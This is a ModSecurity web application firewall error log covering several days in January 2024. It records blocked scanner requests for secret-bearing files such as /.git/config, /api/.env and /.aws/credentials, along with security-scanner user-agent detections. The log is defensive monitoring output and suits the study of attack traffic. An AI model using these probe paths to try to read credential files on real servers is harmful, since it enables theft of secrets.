[Tue Jan 23 04:42:37.506084 2024] [:error] [pid 554158] [client 193.32.162.180:45158] [client 193.32.162.180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za81rXG9Pc-o6dC4iqfYvgAAAAQ"]
[Tue Jan 23 04:42:37.506412 2024] [:error] [pid 554158] [client 193.32.162.180:45158] [client 193.32.162.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za81rXG9Pc-o6dC4iqfYvgAAAAQ"]
[Tue Jan 23 04:42:37.506602 2024] [:error] [pid 554158] [client 193.32.162.180:45158] [client 193.32.162.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za81rXG9Pc-o6dC4iqfYvgAAAAQ"]
[Tue Jan 23 13:46:47.816236 2024] [:error] [pid 564371] [client 104.234.204.32:58174] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Za-1N8DgZ6DrDnV7qZqwnwAAAAA"]
[Tue Jan 23 13:46:47.816577 2024] [:error] [pid 564371] [client 104.234.204.32:58174] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Za-1N8DgZ6DrDnV7qZqwnwAAAAA"]
[Tue Jan 23 13:46:47.816746 2024] [:error] [pid 564371] [client 104.234.204.32:58174] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Za-1N8DgZ6DrDnV7qZqwnwAAAAA"]
[Tue Jan 23 14:55:30.915800 2024] [:error] [pid 564865] [client 193.32.162.180:55114] [client 193.32.162.180] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Za_FUs6i0iNGBnWQEJsjWAAAAAc"]
[Tue Jan 23 14:55:30.916051 2024] [:error] [pid 564865] [client 193.32.162.180:55114] [client 193.32.162.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Za_FUs6i0iNGBnWQEJsjWAAAAAc"]
[Tue Jan 23 14:55:30.916195 2024] [:error] [pid 564865] [client 193.32.162.180:55114] [client 193.32.162.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Za_FUs6i0iNGBnWQEJsjWAAAAAc"]
[Tue Jan 23 17:57:56.965018 2024] [:error] [pid 581106] [client 3.89.98.136:57672] [client 3.89.98.136] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za_wFEqLfSM5mkZBv6AhxgAAAAs"]
[Tue Jan 23 17:57:56.965334 2024] [:error] [pid 581106] [client 3.89.98.136:57672] [client 3.89.98.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za_wFEqLfSM5mkZBv6AhxgAAAAs"]
[Tue Jan 23 17:57:56.965534 2024] [:error] [pid 581106] [client 3.89.98.136:57672] [client 3.89.98.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Za_wFEqLfSM5mkZBv6AhxgAAAAs"]
[Tue Jan 23 17:58:02.616851 2024] [:error] [pid 580435] [client 3.89.98.136:57678] [client 3.89.98.136] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za_wGidAwNReVtctkdgx3wAAAAA"]
[Tue Jan 23 17:58:02.617213 2024] [:error] [pid 580435] [client 3.89.98.136:57678] [client 3.89.98.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za_wGidAwNReVtctkdgx3wAAAAA"]
[Tue Jan 23 17:58:02.617470 2024] [:error] [pid 580435] [client 3.89.98.136:57678] [client 3.89.98.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Za_wGidAwNReVtctkdgx3wAAAAA"]
[Thu Jan 25 08:42:44.460261 2024] [:error] [pid 613544] [client 18.206.208.175:49604] [client 18.206.208.175] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbIQ9Ej9DxchwNISWDvWlQAAAAA"]
[Thu Jan 25 08:42:44.462879 2024] [:error] [pid 613544] [client 18.206.208.175:49604] [client 18.206.208.175] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbIQ9Ej9DxchwNISWDvWlQAAAAA"]
[Thu Jan 25 08:42:44.463090 2024] [:error] [pid 613544] [client 18.206.208.175:49604] [client 18.206.208.175] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbIQ9Ej9DxchwNISWDvWlQAAAAA"]
[Thu Jan 25 08:42:44.565356 2024] [:error] [pid 614167] [client 18.206.208.175:49618] [client 18.206.208.175] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZbIQ9CROZ8HEpbkzKcp7wQAAAAY"]
[Thu Jan 25 08:42:44.565626 2024] [:error] [pid 614167] [client 18.206.208.175:49618] [client 18.206.208.175] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZbIQ9CROZ8HEpbkzKcp7wQAAAAY"]
[Thu Jan 25 08:42:44.565809 2024] [:error] [pid 614167] [client 18.206.208.175:49618] [client 18.206.208.175] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZbIQ9CROZ8HEpbkzKcp7wQAAAAY"]
[Thu Jan 25 10:21:23.530970 2024] [:error] [pid 613546] [client 171.67.70.229:40020] [client 171.67.70.229] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZbIoExIQIGYJH_IlOM9yqwAAAAI"]
[Thu Jan 25 10:21:23.531393 2024] [:error] [pid 613546] [client 171.67.70.229:40020] [client 171.67.70.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZbIoExIQIGYJH_IlOM9yqwAAAAI"]
[Thu Jan 25 10:21:23.531587 2024] [:error] [pid 613546] [client 171.67.70.229:40020] [client 171.67.70.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZbIoExIQIGYJH_IlOM9yqwAAAAI"]
[Thu Jan 25 14:21:23.255659 2024] [:error] [pid 621674] [client 171.67.70.233:58716] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZbJgU0-G447Z2AkBmMZduwAAAAg"]
[Thu Jan 25 14:21:23.256143 2024] [:error] [pid 621674] [client 171.67.70.233:58716] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZbJgU0-G447Z2AkBmMZduwAAAAg"]
[Thu Jan 25 14:21:23.256334 2024] [:error] [pid 621674] [client 171.67.70.233:58716] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZbJgU0-G447Z2AkBmMZduwAAAAg"]
[Sun Jan 28 12:38:43.640257 2024] [:error] [pid 700633] [client 54.209.86.245:43314] [client 54.209.86.245] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "ZbY8wwWm2kVylPLkjujPPgAAAAk"]
[Sun Jan 28 12:38:43.648339 2024] [:error] [pid 700633] [client 54.209.86.245:43314] [client 54.209.86.245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "ZbY8wwWm2kVylPLkjujPPgAAAAk"]
[Sun Jan 28 12:38:43.648559 2024] [:error] [pid 700633] [client 54.209.86.245:43314] [client 54.209.86.245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "ZbY8wwWm2kVylPLkjujPPgAAAAk"]
[Sun Jan 28 13:53:18.774308 2024] [:error] [pid 693510] [client 54.209.86.245:59278] [client 54.209.86.245] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "ZbZOPlMec8X_NupEikpx_wAAAAQ"]
[Sun Jan 28 13:53:18.774651 2024] [:error] [pid 693510] [client 54.209.86.245:59278] [client 54.209.86.245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "ZbZOPlMec8X_NupEikpx_wAAAAQ"]
[Sun Jan 28 13:53:18.774851 2024] [:error] [pid 693510] [client 54.209.86.245:59278] [client 54.209.86.245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "ZbZOPlMec8X_NupEikpx_wAAAAQ"]
[Sun Jan 28 15:48:01.481903 2024] [:error] [pid 693509] [client 54.209.86.245:40672] [client 54.209.86.245] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /skripts/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/skripts/.git/config"] [unique_id "ZbZpIUQygK0QVcTmISir3gAAAAM"]
[Sun Jan 28 15:48:01.482198 2024] [:error] [pid 693509] [client 54.209.86.245:40672] [client 54.209.86.245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/skripts/.git/config"] [unique_id "ZbZpIUQygK0QVcTmISir3gAAAAM"]
[Sun Jan 28 15:48:01.482369 2024] [:error] [pid 693509] [client 54.209.86.245:40672] [client 54.209.86.245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/skripts/.git/config"] [unique_id "ZbZpIUQygK0QVcTmISir3gAAAAM"]
[Sun Jan 28 16:36:20.531230 2024] [:error] [pid 693508] [client 54.209.86.245:54450] [client 54.209.86.245] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "ZbZ0dPjdwTDGtIhSWzFa5QAAAAI"]
[Sun Jan 28 16:36:20.531586 2024] [:error] [pid 693508] [client 54.209.86.245:54450] [client 54.209.86.245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "ZbZ0dPjdwTDGtIhSWzFa5QAAAAI"]
[Sun Jan 28 16:36:20.531766 2024] [:error] [pid 693508] [client 54.209.86.245:54450] [client 54.209.86.245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "ZbZ0dPjdwTDGtIhSWzFa5QAAAAI"]
[Sun Jan 28 22:03:56.257540 2024] [:error] [pid 693508] [client 3.91.39.240:58582] [client 3.91.39.240] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZbbBPPjdwTDGtIhSWzFa8QAAAAI"]
